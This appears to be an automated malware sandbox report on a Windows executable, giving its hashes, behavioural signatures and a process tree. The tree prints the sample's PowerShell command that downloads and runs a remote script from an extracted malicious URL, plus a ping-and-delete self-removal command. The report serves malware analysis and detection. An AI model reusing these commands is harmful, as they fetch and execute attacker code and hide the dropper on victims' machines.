Analysis
- max time kernel: 1s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20230831-en
- resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
- submitted: 13-10-2023 02:20
Static task: static1
Behavioral task: behavioral1
- Sample: c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe
- Resource: win7-20230831-en
Behavioral task: behavioral2
- Sample: c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe
- Resource: win10v2004-20230915-en
General
- Target: c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe
- Size: 247KB
- MD5: f17afa21e88b7a362db5ae8fdfa43de9
- SHA1: 14b024dfe1f9aa6eb88bc7e2215e4877c92cc01e
- SHA256: c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf
- SHA512: efbdcd1c0fb91cb15de2935ed500fb0f9a8b3ef1491e9823850e97451348cd3a170bc0ad3c84086438508f7280f100a33ff8299a7de64093129b2d7ea83b8e0d
- SSDEEP: 3072:98iTSP3d1hp5xnAs03vx54qylRs8crPGjl5mS3qI79TPJvLCw8DSmfNKgAiNNrc4:90zl37r79h2DSm1SgAOmhzN+
Malware Config
- Extracted URL: https://aszfiltration.com/storage/files/debug2.ps1
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Runs ping.exe (1 TTPs, 1 IoCs)
- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes: c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe, cmd.exe
  description                          | pid  | process                                                                  | target process
  PID 1924 wrote to memory of 2188     | 1924 | c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe | cmd.exe
  PID 1924 wrote to memory of 2188     | 1924 | c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe | cmd.exe
  PID 1924 wrote to memory of 2188     | 1924 | c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe | cmd.exe
  PID 1924 wrote to memory of 2188     | 1924 | c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe | cmd.exe
  PID 2188 wrote to memory of 1312     | 2188 | cmd.exe                                                                  | powershell.exe
  PID 2188 wrote to memory of 1312     | 2188 | cmd.exe                                                                  | powershell.exe
  PID 2188 wrote to memory of 1312     | 2188 | cmd.exe                                                                  | powershell.exe
Processes
- Depth 1: C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe"
  PID: 1924
  Signatures: Suspicious use of WriteProcessMemory
  - Depth 2: C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')"
    PID: 2188
    Signatures: Suspicious use of WriteProcessMemory
  - Depth 2: C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe" >> NUL
    PID: 2516
    - Depth 3: C:\Windows\SysWOW64\PING.EXE
      Command line: ping 127.0.0.1
      PID: 2624
      Signatures: Runs ping.exe
- Depth 1: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')
  PID: 1312